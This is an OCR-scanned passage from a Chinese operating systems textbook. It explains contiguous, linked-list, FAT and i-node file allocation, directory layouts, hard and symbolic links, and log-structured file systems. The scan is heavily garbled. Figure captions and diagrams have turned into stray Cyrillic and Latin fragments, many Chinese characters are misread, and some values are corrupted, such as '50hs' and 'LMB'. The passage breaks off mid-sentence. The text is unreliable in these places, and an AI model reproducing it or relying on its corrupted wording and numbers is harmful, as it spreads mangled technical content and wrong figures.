其 次 ， 读 操作 性 能 较 好 ， 因 为 在 单个 操作 中 就 可 以 从 磁盘 上 读 出 整个 文件 。 只 需要 一 次 寻找 (对 第 
一 个 块 )。 之 后 不 再 需要 录 道 和 旋转 延迟 ， 所 以 ， 数 据 以 磁盘 全 带宽 的 速率 输入 。 可 见 连 续 分 配 实现 简 
单 且 具 有 高 的 性 能 。 


文件 B 5 个 空闲 块 6 个 空闲 块 
b) 


图 4-10 a) 为 7 个 文件 连续 分 配 空间 ，b) 删除 文件 D 和 F 后 磁盘 的 状态 


但 是 ， 连 续 分 配方 案 也 同样 有 相当 明显 的 不 足 之 处 ， 随 着 时 间 的 推移 ， 磁盘 会 变 得 零碎 。 为 了 了 解 
这 是 如 何 发 生 的， 请 考察 图 4-10b。 这 里 有 两 个 文件 (DAF) ИМИ Т. 当 删 除 一 个 文件 时 ， 它 占用 的 
块 自然 就 释放 了 ， 在 磁盘 上 留 下 一 堆 空闲 块 。 磁 盘 不 会 在 这 个 位 置 挤 压 掉 这 个 空洞， 因为 这 样 会 涉及 复 
制 空 洞 之 后 的 所 有 文件 ， 可 能 会 有 上 百 万 的 块 。 结 果 是 ， 磁盘 上 最 终 既 包括 文件 也 有 空洞 ， 如 图 4-10 中 
所 描述 的 那样 。 

开始 时 ， 碎 片 并 不 是 问题 ， 因 为 每 个 新 的 文件 都 在 先前 文件 的 磁盘 结尾 写 信 。 但 是 ， 磁 盘 最 终 会 被 
充满 ， 所 以 要 么 压缩 磁盘 ， 要 么 重新 使 用 空洞 中 的 空 闪 空间 。 前 者 由 于 代价 太 高 而 不 可 行 ， 后 者 需要 维 
护 一 个 空洞 列表 ， 这 是 可 行 的 。 但 是 ， 当 创建 一 个 新 的 文件 时 ， 为 了 挑选 合适 大 小 的 空洞 存 入 文件， 就 
有 必要 知道 该 文件 的 最 终 大 小 。 

设想 这 样 一 种 设计 的 结果 : 为 了 录入 一 个 文档 ， 用 户 启动 了 文本 编辑 器 或 字 处 理 软件 。 程 序 首先 询 
问 最 终 文件 的 大 小 会 是 多 少 。 这 个 问题 必须 回答 ， 否 则 程序 就 不 能 继续 。 如 果 给 出 的 数字 最 后 被 证 明 小 
于 文件 的 实际 大 小 ， 该 程序 会 终止 ， 因 为 所 使 用 的 磁盘 空洞 已 经 满 了 ， 没有 地 方 放置 文件 的 剩余 部 分 。 
如 果 用 户 为 了 避免 这 个 问题 而 给 出 不 实际 的 较 大 的 数字 作为 最 后 文件 的 大 小 ， 比 如 ，100 MB, #8 
可 能 找 不 到 如 此 大 的 空洞 ， 从 而 宣布 无 法 创建 该 文件 。 当 然 ， 用 户 有 权 下 一 次 使 用 比如 50MB 的 数字 再 
次 启动 编辑 器 ， 如 此 进行 下 去 ， 直 到 找到 一 个 合适 的 空洞 为 止 。 不 过 ， 这 种 方式 看 来 不 会 使 用 户 高 兴 。 

然而 ， 存 在 着 一 种 情形 ， 使 得 连续 分 配方 案 是 可 行 的 ， 而 且 ， 实际 上 这 个 办 法 在 CD-ROM 上 被 广泛 
使 用 着 。 在 这 里 所 有 文件 的 大 小 都 事先 知道 ， 并 且 在 CD-ROM 文件 系统 的 后 续 使 用 中 ， 这 些 文件 的 大 
小 也 不 再 改变 。 在 本 章 的 后 面 ， 我 们 将 讨论 最 常见 的 CD-ROM 文件 系统 。 

DVD 的 情况 有 些 复杂 。 原 则 上 ， 一 个 90 分 钟 的 电影 可 以 编码 成 一 个 独立 的 、 大 约 4.5GB 的 文件 。 但 
是 文件 系统 所 使 用 的 UDF (Universal Disk Format) 格式 ， 使 用 了 一 个 30 位 的 数 来 代表 文件 长 度 ， 从 而 
把 文件 大 小 限制 在 1GB。 其 结果 是 ， DVD 电 影 一 般 存储 在 3 个 或 4 个 1GB 的 连续 文件 中 。 这 些 构成 一 个 逻 
辑 文件 (电影) 的 物理 文件 块 被 称 作 extents。 

正如 第 1 章 中 所 提 到 的 ， 在 计算 机 科学 中 ， 随 着 新 一 代 技术 的 出 现 ， 历 史 往往 重复 着 自己 。 多 年 前 ， 
连续 分 配 由 于 其 简单 和 高 性 能 (没有 过 多 考虑 用 户 友好 性 ) 被 实际 用 在 磁盘 文件 系统 中 。 后 来 由 于 讨厌 
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在 文件 创建 时 不 得 不 指定 最 终 文 件 的 大 小 ， 这 个 想法 被 放弃 了 。 但 是 ， 随 着 CD-ROM、DVD 以 及 其 他 一 
次 性 写 光学 介质 的 出 现 ， 突 然 间 连 续 分 配 又 成 为 一 个 好 主意 。 所 以 研究 那些 具有 清晰 和 简洁 概念 的 老式 
系统 和 思想 是 很 重要 的 ， 因 为 它们 有 可 能 以 一 种 令 人 吃惊 的 方式 在 未 来 系统 中 获得 应 用 。 


2. 链表 分 配 
存储 文件 的 第 二 种 方法 是 为 每 个 文件 构造 磁盘 块 链表 ， 如 图 4-11 所 示 。 每 个 块 的 第 一 个 字 作 为 指向 
FF 一块 的 指针 ， 块 的 其 他 部 分 存放 数据 。 文件 A 
与 连续 分 配方 案 不 同 ， 这 一 方法 可 以 充分 | гет] 
利用 每 个 磁盘 块 。 不 会 因为 磁盘 碎片 (除了 最 
后 一 块 中 的 内 部 碎片 ) 而 浪费 存储 空间 。 同 样 ， ү е | | 3E 
在 目录 项 中 ， 只 需要 存放 第 一 块 的 磁盘 地 址 ， 0 1 2 3 4 
文件 的 其 他 块 就 可 以 从 这 个 首 块 地 址 查找 到 。 m а 7 2 10 12 
另 一 方面 ， 在 链表 分 配方 案 中 ， 尽 管 顺序 ie 
读 文件 非常 方便 ， 但 是 随机 存 取 却 相当 缓慢 。 9-4-5] 
要 获得 块 4， 操 作 系统 每 一 次 都 必须 从 头 开始 ， и) [к#| [к] [кї 
并 且 要 先 读 前 面 的 "一 1 块 。 显 然 ， 进 行 如 此 多 的 ГА ГА % pi | 
读 操作 太 慢 了 。 ы Е Ш 
而 且 ， 由 于 指针 占 去 了 一 些 字 节 ， 每 个 碰 PRR 。 6 н 4 
盘 块 存储 数据 的 字 节 数 不 再 是 2 的 整数 次 寡 。 虽 图 4-11 以 磁盘 块 的 链表 形式 存储 文件 


然 这 个 问题 并 不 是 非常 严重 ， 但 是 怪异 的 大 小 
确实 降低 了 系统 的 运行 效率 ， 因为 许多 程序 都 是 以 长 度 为 2 的 整数 次 雷 来 读 写 磁 鼻 块 的 。 由 于 每 个 块 的 
前 几 个 字 节 被 指向 下 一 个 块 的 指针 所 占据 ， 所 以 要 读 出 完整 的 一 个 块 ， 就 需要 从 两 个 磁盘 块 中 获得 和 拼 


接 信息 ， 这 就 因 复制 引发 了 额外 的 开销 。 Рең 


З. 在 内 存 中 采用 表 的 链表 分 配 9—9 
如 果 取出 每 个 磁盘 块 的 指针 字 ， 把 它 放 在 
内 存 的 一 个 表 中 ， 就 可 以 解决 上 述 链表 的 两 个 [Гю = 
不 足 。 图 4-12 表 示 了 图 4-11 所 示例 子 的 内 存 中 ara 
表 的 内 容 。 这 两 个 图 中 有 两 个 文件 ， 文 件 A 依 次 a TE A 
使 用 了 磁盘 块 4、7、2、10 和 12， 文 件 B 依 次 使 5 文件 B 从 
用 了 磁盘 块 6、3、11 和 14。 利 用 图 4-12 中 的 表 ， з |-- ала 
可 以 从 第 4 块 开始 ， 顺 着 链 走 到 最 后 ， 找 到 文件 一 一 
A 的 全 部 磁盘 块 。 同 样 ， 从 第 6 块 开 始 ， 顺 着 链 ә 
走 到 最 后 ， 也 能 够 找 出 文件 B 的 全 部 磁盘 块 。 这 es T] 
两 个 链 都 以 一 个 不 属于 有 效 磁盘 编号 的 特殊 标 "С 
记 (如 -1) 结束 。 内 存 中 的 这 样 一 个 表格 称 为 кыша =] 
文件 分 配 表 (File Allocation Table, FAT), H ~- 
按 这 类 方式 组 织 ， 整 个 块 都 可 以 存放 数据 。 „Г == ы ани 


进而 ， 随 机 存 取 也 容易 得 多 。 虽 然 仍 要 顺 着 链 
在 文件 中 查找 给 定 的 偏 移 量 ,但 是 整个 链表 都 图 4-12 在 内 存 中 使 用 文件 分 配 表 的 链表 分 配 
存放 在 内 存 中 ， 所 以 不 需要 任何 磁盘 引用 。 与 
前 面 的 方法 相同 ， 不 管 文件 有 多 大 ， 在 目录 项 中 只 需 记录 一 个 整数 (起 始 块 号 ) ， 按 照 它 就 可 以 找到 文 
件 的 全 部 块 。 

这 种 方法 的 主要 缺点 是 必须 把 整个 表 都 存放 在 内 存 中 。 对 于 200 GB 的 磁盘 和 1KB 大 小 的 块 ， 这 张 
表 需 要 有 2 亿 项 ， 每 一 项 对 应 于 这 2 亿 个 磁盘 块 中 的 一 个 块 。 每 项 至 少 3 个 字 节 ， 为 了 提高 查找 速度 ， 有 
时 需要 4 个 字 节 。 根 据 系统 对 空间 或 时 间 的 优化 方案 ， 这 张 表 要 占用 600MB 或 800MB 内 存 ， 不 太 实用 。 
很 显然 FAT 方 案 对 于 大 磁盘 而 言 不 太 合适 。 
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4.i 节 点 

最 后 一 个 记录 各 个 文件 分 别 包含 哪些 磁盘 块 的 方法 是 给 每 个 文件 赋予 一 个 称 为 i 节点 (index-node) 
的 数据 结构 ， 共 中 列 出 了 文件 属性 和 文件 块 的 磁盘 地 址 。 图 4-13 中 是 一 个 简单 例子 的 描述 。 给 定 节 点 ， 
就 有 可 能 找到 文件 的 所 有 块 。 相 对 于 在 内 存 中 采用 表 的 方式 而 言 ， 这 种 机 制 具有 很 大 的 优势 ， 即 只 有 在 
对 应 文件 打开 时 ， 其 ;节点 才 在 内 存 中。 如 果 每 个 地 一 一 一 一 一 一 一 


点 占有 "个 字 节 ， 最 多 k 个 文件 同时 打开 ， 那 么 为 了 打 文件 属性 
开 文 件 而 保留 ;节点 的 数组 所 占据 的 全 部 内 存 仅仅 是 kn ТТТ 
个 字 节 。 只 需要 提前 保留 少量 的 空间 。 TAANE 


КОШЕ He ЕЧЕН СН ВЕ (FAT) жаром 
所 占据 的 空间 要 小 。 其 原因 很 简单 ， 保 留 所 有 了 碰 盘 块 ани 
的 链接 表 的 表 大 小 正比 于 磁盘 自身 的 大 小 。 如 果 磁盘 
有 n 块 ， 该 表 需 要 a 个 表 项 。 由 于 磁盘 变 得 更 大 ， 该 表 шашы 
格 也 线性 随 之 增加 。 相 反 ，i 节 点 机 制 需要 在 内 存 中 有 | SAAE — 


一 个 数组 ， 其 大 小 正比 于 可 能 要 同时 打开 的 最 大 文件 磁盘 块 6 的 地 址 ~ 
个 数 。 它 与 磁盘 是 10GB、100GB 还 是 1000GB 无 关 。 磁盘 块 7 的 地 址 

i 节点 的 一 个 问题 是 ， 如 果 每 个 i 节点 只 能 存储 固 指针 块 的 地 址 Ге 
定数 量 的 磁盘 地 址 ， 那 么 当 一 个 文件 所 含 的 磁盘 块 的 кажаа 
数目 超出 了 i 节点 所 能 容纳 的 数目 怎么 办 ? 一 个 解决 方 地 址 的 磁盘 块 
案 是 最 后 一 个 “磁盘 地 址 ”不 指向 数据 块 ， 而 是 指向 


-个 包含 磁盘 块 地 址 的 块 的 地 址 ， 如 图 4-13 所 示 。 更 | 
高 级 的 解决 方案 是 :可 以 有 两 个 或 更 多 个 包含 磁盘 地 MEL 过 点 的 例子 
址 的 块 ， 或 者 指向 其 他 存放 地 址 的 磁盘 块 的 磁盘 块 。 在 后 面 讨论 UNIX 时 ， 我 们 还 将 涉及 ;i 节 点 。 


4.3.3 目录 的 实现 

在 读 文件 前 ， 必 须 先 打开 文件 。 打 开 文 件 时 ， 操 作 系 统 利用 用 户 给 出 的 路 径 名 找到 相应 目录 项 。 目 
录 项 中 提供 了 查找 文件 磁盘 块 所 需要 的 信息 。 因 系统 而 异 ， 这 些 信息 有 可 能 是 整个 文件 的 磁盘 地 址 (对 
于 连续 分 配方 案 )、 第 一 个 块 的 编号 (对 于 两 种 链表 分 配方 案 ) 或 者 是 i 节点 号 。 无 论 怎样 ， 目 录 系统 的 
主要 功能 是 把 ASCII 文 件 名 映射 成 定位 文件 数据 所 需 的 信息 。 

与 此 密切 相关 的 问题 是 在 何 处 存放 文件 属性 。 每 个 文件 系统 维护 诸如 文件 所 有 者 以 及 创建 时 间 等 文 
件 属 性 ， 它 们 必须 存储 在 某 个 地 方 。 一 种 显而易见 的 方法 是 把 文件 属性 直接 存放 在 目录 项 中 。 很 多 系统 
确实 是 这 样 实现 的 。 这 个 办 法 用 图 4-14a 说 明 。 在 这 个 简单 设计 中 ， 目 录 中 有 一 大 小 的 目录 项 列 
表 ， 每 个 文件 对 应 一 项 ， 其 中 包含 一 个 (固定 长 度 ) 文件 名 、 一 个 文件 属性 结构 以 及 用 以 说 明 磁 盘 块 位 
置 的 一 个 或 多 个 磁盘 地 址 (至 某 个 最 大 值 )。 


т 
games ! 属性 games | 
mail ”， 属性 | mail | о] 
news · 属性 news } 
жыш] р = 
| 包含 属性 的 
а b) 数据 结构 


图 4-14 a) 简单 目录 ， 包 含 固定 大 小 的 目录 项 ， 在 目录 项 中 有 磁盘 地 址 
和 属性 ，b) 每 个 目录 项 只 引用 i 节 点 的 目录 


对 于 采用 i 节点 的 系统 ， 还 存在 另 一 种 方法 ， 即 把 文件 属性 存放 在 i 节点 中 而 不 是 目录 项 中 。 在 这 种 
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情形 下 ， 目 录 项 会 更 短 :只 有 文件 名 和 i 节点 号 。 这 种 方法 参见 图 4-14b。 后 面 我 们 会 看 到 ， 与 把 属性 存 
放 到 目录 项 中 相 比 ， 这 种 方法 更 好 。 图 4-14 中 的 两 种 处 理 方法 分 别 对 应 Windows 和 UNIX， 在 后 面 我 们 
将 讨论 它们 。 

到 日 前 为 止 ， 我们 已 经 假设 文件 具有 较 短 的 、 固 定 长 度 的 名 字 。 在 MS-DOS 中 ， 文 件 有 1~8 个 字符 
的 基本 名 和 1~3 字 符 的 可 选 扩展 名 。 在 UNIX V7 中 文件 名 有 1~14 个 字符 ， 包 括 任何 扩展 名 。 但 是 ， 儿 乎 
所 有 的 现代 操作 系统 都 支持 可 变 长 度 的 长 文件 名 。 那 么 它们 是 如 何 实现 的 呢 ? 

最 简单 的 方法 是 给 予 文件 名 一 个 长 度 限制 ， 典 型 值 为 255 个 字符 ， 然 后 使 用 图 4-14 中 的 一 种 设计 
并 为 每 个 文件 名 保留 255 个 字符 空间 。 这 种 处 理 很 简单 ， 但 是 浪费 了 大 量 的 目录 空间 ， 因 为 只 有 很 少 的 
文件 会 有 如 此 长 的 名 字 。 从 效率 考虑 ， 我 们 希望 有 其 他 的 结构 。 

一 种 替代 方案 是 放弃 “所 有 目录 项 大 小 一 样 ”的 想法 。 这 种 方法 中 ， 每 个 目录 项 有 一 个 固定 部 分 
这 个 固定 部 分 通常 以 目录 项 的 长 度 开始 ， 后 面 是 固定 格式 的 数据 ， 通 常 包括 所 有 者 、 创 建 时 间 、 保 护 信 
息 以 及 其 他 属性 。 这 个 固定 长 度 的 头 的 后 面 是 实际 文件 名 ， 可 能 是 如 图 4-15a 中 的 正 序 格式 放置 (如 
SPARC 机 器 ) S。 在 这 个 例子 中 ， 有 三 个 文件 ，project-budget 、personnel 和 foo。 每 个 文件 名 以 一 个 特 
殊 字 符 (通常 是 0) 结束 ， 在 图 4-15 中 用 带 又 的 矩形 表示 。 为 了 使 每 个 目录 项 从 字 的 边界 开始 ， 每 个 文 
件 名 被 填充 成 整数 个 字 ， 如 图 4-15 中 带 阴影 的 矩形 所 示 。 


指向 文件 1 的 文件 名 
-rz 
кюй 指向 文件 件 名 


指向 文件 3 的 文件 名 


图 4-15 在 目录 中 处 理 长 文件 名 的 两 种 方法 :a) 在 行 中 ，b) 在 堆 中 


这 个 方法 的 缺点 是 ， 当 移 走 文件 后 ， 就 引入 了 一 个 长 度 可 变 的 空 阶 ， 而 下 一 个 进来 的 文件 不 一 定 正 
好 适合 这 个 空 陵 。 这 个 问题 与 我 们 已 经 看 到 的 连续 磁盘 文件 的 问题 是 一 样 的 ， 由 于 整个 目录 在 内 存 中 
所 以 只 有 对 目录 进行 紧 凌 操作 才 可 节省 空间 。 另 一 个 问题 是 ， 一 个 目录 项 可 能 会 分 布 在 多 个 页 面 上 ， 在 
读 取 文件 名 时 可 能 发 生 页 面 故 障 。 

处 理 可 变 长 度 文件 名 字 的 另 一 种 方法 是 ， 使 目录 项 自身 都 有 固定 长 度 ， 而 将 文件 名 放置 在 目录 后 面 
的 堆 中 ， 如 图 4-15b 所 示 。 这 一 方法 的 优点 是 ， 当 一 个 文件 目录 项 被 移 走 后 ， 另 一 个 文件 的 目录 项 总 是 
可 以 适合 这 个 空 阶 。 当 然 ， 必 须要 对 堆 进行 管理 ， 而 在 处 理 文件 名 时 页 面 故障 仍旧 会 发 生 。 另 一 个 小 优 


Ө 处 理 机 中 的 一 申 字符 存放 的 顺序 有 正 序 (big-endian) 和 逆序 (little-endian) 之 分 。 正 序 存放 就 是 高 字 节 存 
放 在 前 低 字 节 在 后 ， 而 洲 序 存放 就 是 低 字 节 在 前 高 字 节 在 后 。 例 如 ， 十 六 进 制 数 为 A02B ， 正 序 存放 就 是 
A02B ， 逆 序 存放 就 是 2BA0。 一 一 译 者 注 
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点 是 文件 名 不 再 需要 从 字 的 边界 开始 ， 这 样 ， 原 先 在 图 4-15a 中 需要 的 填充 字符 ， 在 图 4-15b 中 的 文件 名 
之 后 就 不 再 需要 了 。 

到 目前 为 止 ， 在 需要 查找 文件 名 时 ， 所 有 的 方案 都 是 线性 地 从 头 到 尾 对 目录 进行 搜索 。 对 于 非常 长 
的 目录 ， 线 性 查找 就 太 慢 了 。 加 快 查找 速度 的 一 个 方法 是 在 每 个 目录 中 使 用 散 列表 。 设 表 的 大 小 为 n。 
在 输入 文件 名 时 ， 文 件 名 被 散 列 到 1 和 n 一 1 之 间 的 一 个 值 ， 例 如 ， 它 被 n 除 ， 并 取 余 数 。 其 他 可 以 采用 的 
方法 有 ， 对 构成 文件 名 的 字 求 和 ， 其 结果 被 r 除 ， 或 某 些 类 似 的 方法 。 

不 论 哪 种 方法 都 要 对 与 散 列 码 相对 应 的 散 列 表 表 项 进行 检查 。 如 果 该 表 项 没有 被 使 用 ， 就 将 一 个 指 
向 文件 目录 项 的 指针 放 和 人， 文件 目录 项 紧 连 在 散 列表 后 面 。 如 果 该 表 项 被 使 用 了 ， 就 构造 一 个 链表 ， 该 
链表 的 表 头 指针 存放 在 该 表 项 中 ， 并 链接 所 有 具有 相同 散 列 值 的 文件 目录 项 。 

查找 文件 按照 相同 的 过 程 进行 。 散 列 处 理 文件 名 ， 以 便 选 择 一 个 散 列 表 项 。 检 查 链 表 头 在 该 位 置 上 
的 所 有 表 项 ， 查 看 要 找 的 文件 名 是 否 存在 。 如 果 名 字 不 在 该 链 上 ， 该 文件 就 不 在 这 个 目录 中 。 

使 用 散 列 表 的 优点 是 查找 非常 迅速 。 其 缺点 是 需要 复杂 的 管理 。 只 有 在 预计 系统 中 的 目录 经 常会 有 
成 百 上 千 个 文件 时 ， 才 把 散 列 方案 真正 作为 备用 方案 考虑 。 

一 种 完全 不 同 的 加 快 大 型 目录 查找 速度 的 方法 是 ， 将 查找 结果 存 入 高 速 缓存 。 在 开始 查找 之 前 ， 先 
查看 文件 名 是 否 在 高 速 缓存 中 。 如 果 是 ， 该 文件 可 以 立即 定位 。 当 然 ， 只 有 在 构成 查找 主体 的 文件 非常 
少 的 时 候 ， 高 速 缓存 的 方案 才 有 效果 。 


4.3.4 共享 文件 

当 几 个 用 户 同 在 一 个 项 目 里 工作 时 ， 他 们 常常 需要 共享 文件 。 其 结果 是 ， 如 果 一 个 共享 文件 同时 
出 现在 属于 不 同 用 户 的 不 同 目录 下 ， 工 作 起 来 就 很 方便 。 图 
4-16 再 次 给 出 图 4-7 所 示 的 文件 系统 ， 只 是 C 的 一 个 文件 现在 
也 出 现在 B 的 目录 下 。B 的 目录 与 该 共享 文件 的 联系 称 为 一 个 
连接 (link)。 这 样 ， 文 件 系统 本 身 是 一 个 有 向 无 环 图 
(Directed Acyclic Graph, DAG) 而 不 是 一 棵 树 。 

共享 文件 是 方便 的 ， 但 也 带 来 一 些 问题 。 如 果 目 录 中 包 
含 磁盘 地 址 ， 则 当 连 接 文件 时 ， 必 须 把 C 目 录 中 的 磁盘 地 址 
复制 到 B 目 录 中 。 如 果 B 或 C 随 后 又 往 该 文件 中 添加 内 容 ， 则 
新 的 数据 块 将 只 列 入 进行 添加 工作 的 用 户 的 目录 中 。 其 他 的 
用 户 对 此 改变 是 不 知道 的 。 所 以 违背 了 共享 的 目的 。 

有 两 种 方法 可 以 解决 这 一 问题 。 在 第 一 种 解决 方案 中 ， 
磁盘 块 不 列 入 目录 ， 而 是 列 入 一 个 与 文件 本 身 关 联 的 小 型 数 
据 结构 中 。 目 录 将 指向 这 个 小 型 数据 结构 。 这 是 UNIX 系 统 中 图 4-16 有 共享 文件 的 文件 系统 
所 采用 的 方法 〈 小 型 数据 结构 即 是 i 节 点 ) 。 

在 第 二 种 解决 方案 中 ， 通 过 让 系统 建立 一 个 类 型 为 LINK 的 新 文件 ， 并 把 该 文件 放 在 B 的 目录 下 ， 使 
得 B 与 C 的 一 个 文件 存在 连接 。 新 的 文件 中 只 包含 了 它 所 连接 的 文件 的 路 径 名 。 当 B 读 该 连接 文件 时 ， 操 
作 系统 查看 到 要 读 的 文件 是 LINK 类 型 ， 则 找到 该 文件 所 连接 的 文件 的 名 字 ， 并 且 去 读 那个 文件 。 与 伟 
统 ( 硬 ) 连接 相对 比 起 来 ， 这 一 方法 称 为 符号 连接 (symbolic linking), 

以 上 每 一 种 方法 都 有 其 缺点 。 第 一 种 方法 中 ， 当 B 连 接 到 共享 文件 时 ，i 节 点 记录 文件 的 所 有 者 是 C。 
建立 一 个 连接 并 不 改变 所 有 关系 ( 见 图 4-17)， 但 它 将 ;节点 的 连接 计数 加 1， 所 以 系统 知道 目前 有 多 少 目 
录 项 指向 这 个 文件 。 

如 果 以 后 C 试 图 删除 这 个 文件 ， 系 统 将 面临 问题 。 如 果 系统 删除 文件 并 清除 :节点 ，B 则 有 一 个 目录 
项 指向 一 个 无 效 的 i 节点。 如 果 该 ;节点 以 后 分 配给 另 一 个 文件 ， 则 B 的 连接 指向 一 个 错误 的 文件 。 系 统 通 
过 ;节点 中 的 计数 可 知 该 文件 仍然 被 引用 ， 但 是 没有 办 法 找到 指向 该 文件 的 全 部 目录 项 以 删除 它们 。 指 
向 目录 的 指针 不 能 存储 在 i 节 点 中 ， 原 因 是 有 可 能 有 无 数 个 目录 。 

惟一 能 做 的 就 是 只 删除 C 的 目录 项 ， 但 是 将 i 节 点 保留 下 来 ， 并 将 计数 置 为 1， 如 图 4-17c 所 示 。 而 现 
在 的 状况 是 ， 只 有 B 有 指向 该 文件 的 目录 项 ， 而 该 文件 的 所 有 者 是 C。 如 果 系统 进行 记 账 或 有 配额 ， 那 么 
C 将 继续 为 该 文件 付 账 直到 B 决 定 删除 它 ， 如 果真 是 这 样 ， 只 有 到 计数 变 为 0 的 时 刻 ， 才 会 删除 该 文件 。 
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图 4-17 а) 连接 之 前 的 状况 ，b) 创建 连接 之 后 ，c) 当 所 有 者 删除 文件 后 


对 于 符号 连接 ， 以 上 问题 不 会 发 生 ， 因 为 只 有 真正 的 文件 所 有 者 才 有 一 个 指向 i 节 点 的 指针 。 连 接 到 
该 文件 上 的 用 户 只 有 路 径 名 ， 没 有 指向 ;节点 的 指针 。 当 文件 所 有 者 删除 文件 时 ， 该 文件 被 销毁 。 以 后 若 
试图 通过 符号 连接 访问 该 文件 将 导致 失败 ， 因 为 系统 不 能 找到 该 文件 。 删 除 符号 连接 根本 不 影响 该 文件 

符号 连接 的 问题 是 需要 额外 的 开销 。 必 须 读 取 包含 路 径 的 文件 ， 然 后 要 一 个 部 分 一 个 部 分 地 扫描 路 
径 ， 直 到 找到 i 节点 。 这 些 操作 也 许 需要 很 多 次 额外 的 磁盘 存 取 。 此 外 ， 每 个 符号 连接 都 需要 额外 的 ;地 
点 ， 以 及 额外 的 一 个 磁盘 块 用 于 存储 路 径 ， 虽 然 如 果 路 径 名 很 短 ， 作 为 一 种 优化 ， 系 统 可 以 将 它 存储 在 
i 节 点 中 。 符 号 连接 有 一 个 优势 ， 即 只 要 简单 地 提供 一 个 机 器 的 网 络 地 址 以 及 文件 在 该 机 器 上 驻 留 的 路 
径 ， 就 可 以 连接 全 球 任何 地 方 的 机 器 上 的 文件 。 

还 有 另 一 个 由 连接 带 来 的 问题 ， 在 符号 连接 和 其 他 方式 中 都 存在 。 如 果 允 许 连 接 ， 文 件 有 两 个 或 多 
个 路 径 。 查 找 一 指定 目录 及 其 子 目录 下 的 全 部 文件 的 程序 将 多 次 定位 到 被 连接 的 文件 。 例 如 ， 一 个 将 某 
一 目录 及 其 子 目 录 下 的 文件 转 储 到 磁带 上 的 程序 有 可 能 多 次 复制 一 个 被 连接 的 文件 。 进 而 ， 如 果 接 着 把 
磁带 读 进 另 一 台 机 器 ， 除 非 转 储 程序 具有 智能 ， 否 则 被 连接 的 文件 将 被 两 次 复制 到 磁盘 上 ， 而 不 是 只 是 
被 连接 起 来 。 

4.3.5 日 志 结构 文件 系统 

不 断 进步 的 科技 给 现 有 的 文件 系统 带 来 了 更 多 的 挑战 。 特 别 是 CPU 的 运行 速度 越 来 越 快 ， 磁 盘 容量 
越 来 越 大 ， 价 格 也 越 来 越 便宜 (但 是 磁盘 速度 并 没有 增 快 多 少 ) ， 同 时 内 存 容量 也 以 指数 形式 增长 。 而 
没有 得 到 快速 发 展 的 参数 是 磁盘 的 寻 道 时 间 。 所 以 这 些 问题 综合 起 来 ， 便 成 为 影响 很 多 文件 系统 性 能 的 
一 个 瓶颈 。 为 此 ，Berkeley 设 计 了 一 种 全 新 的 文件 系统 ， 试 图 缓解 这 个 问题 ， 即 日 志 结构 文件 系统 
(Log-structured File System，LFS)。 在 这 一 节 里 ， 我 们 简要 说 明 LFS 是 如 何 工作 的 。 如 果 需 要 了 解 更 多 
相关 知识 ， 请 参阅 (Rosenblum 和 Ousterhout，1991 %. 

促使 设计 LFS 的 主要 原因 是 ，CPU 的 运行 速度 越 来 越 快 ， RAM 内 存 容量 变 得 更 大 ， 同 时 磁盘 高 速 组 
存 也 迅速 地 增加 。 进 而 ， 不 需要 磁盘 访问 操作 ， 就 有 可 能 满足 直接 来 自 文件 系统 高 速 缓存 的 很 大 一 部 分 
读 请 求 。 所 以 从 上 面 的 事实 可 以 推出 ， 未 来 多 数 的 磁盘 访问 是 写 操作 ， 这 样 ， 在 一 些 文件 系统 中 使 用 的 
提前 读 机 制 (需要 读 取 数据 之 前 预 取 磁 盘 块 ) ， 并 不 能 获得 更 好 的 性 能 。 

更 为 精 糕 的 情况 是 ， 在 大 多 数 文件 系统 中 ， 写 操作 往往 都 是 零碎 的 。 一 个 50hs 的 磁盘 写 操作 之 前 通 
常 需要 10ms 的 寻 道 时 间 和 4ms 的 旋转 延迟 时 间 ， 可 见 零碎 的 磁盘 写 操作 是 极其 没有 效率 的 。 根 据 这 些 参 
数 ， 磁 盘 的 效率 降低 到 1% 以 下 。 

为 了 看 看 这 样 小 的 零 克 写 操作 从 何 而 来 ， 考 虑 在 UNIX 文 件 系统 上 创建 一 个 新 文件 。 为 了 写 这 个 文 
件 ， 必 须 写 该 文件 目录 的 i 节 点 、 目 录 块 、 文 件 的 i 节 点 以 及 文件 本 身 。 而 这 些 写 操作 都 有 可 能 被 延迟 
那么 如 果 在 写 操作 完成 之 前 发 生死 机 ， 就 可 能 在 文件 系统 中 造成 严重 的 不 一 致 性 。 正 因为 如 此 ，i 节 点 
的 写 操作 一 般 是 立即 完成 的 。 

出 于 这 一 原因 ，LFS 的 设计 者 决定 重新 实现 一 种 UNIX 文 件 系统 ， 该 系统 即使 对 于 一 个 大 部 分 由 堆 
碎 的 随机 写 操作 组 成 的 任务 ， 同 样 能 够 充分 利用 磁盘 的 带宽 。 其 基本 思想 是 将 整个 磁盘 结构 化 为 一 个 日 
志 。 每 隔 一 段 时 间 ， 或 是 有 特殊 需要 时 ， 被 缓冲 在 内 存 中 的 所 有 未 决 的 写 操作 都 被 放 到 一 个 单独 的 段 中 
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作为 在 日 志 末 尾 的 一 个 邻接 段 写 人 磁盘 。 一 个 单独 的 段 可 能 会 包括 ij 节点、 目录 块 、 数 据 块 或 者 都 有 。 
每 一 个 段 的 开始 都 是 该 段 的 摘要 ， 说 明 该 段 中 都 包含 哪些 内 容 。 如 果 所 有 的 段 平均 在 LMB 左 右 ， 那 么 就 
几乎 可 以 利用 磁盘 的 完整 带宽 。 

在 LFS 的 设计 中 ， 同 样 存在 着 i 节点 ， 且 具有 与 UNIX 中 一 样 的 结构 ， 但 是 i 节点 分 散在 整个 日 志 中 ， 
而 不 是 放 在 磁盘 的 某 一 个 固定 位 置 。 尽 管 如 此 ， 当 一 个 i 节 点 被 定位 后 ， 定 位 一 个 块 就 用 通常 的 方式 来 
完成 。 当 然 ， 由 于 这 种 设计 ， 要 在 磁盘 中 找到 一 个 节点 就 变 得 比较 困难 了 ， 因 为 节点 的 地 址 不 能 像 在 
UNIX 中 那样 简单 地 通过 计算 得 到 。 为 了 能 够 找到 i 节点 ， 必 须要 维护 一 个 由 i 节点 编号 索引 组 成 的 i 节点 
图 。 在 这 个 图 中 的 表 项 i 指向 磁盘 中 的 第 i 个 节点 。 这 个 图 保存 在 磁盘 上 ， 但 是 也 保存 在 高 速 缓存 中 ， 因 
此 ， 大 多 数 情况 下 这 个 图 的 最 常用 部 分 还 是 在 内 存 中 。 

总 而 言 之， 所 有 的 写 操作 最 初 都 被 缓冲 在 内 存 中 ， 然 后 周期 性 地 把 所 有 已 缓冲 的 写作 为 一 个 单独 的 
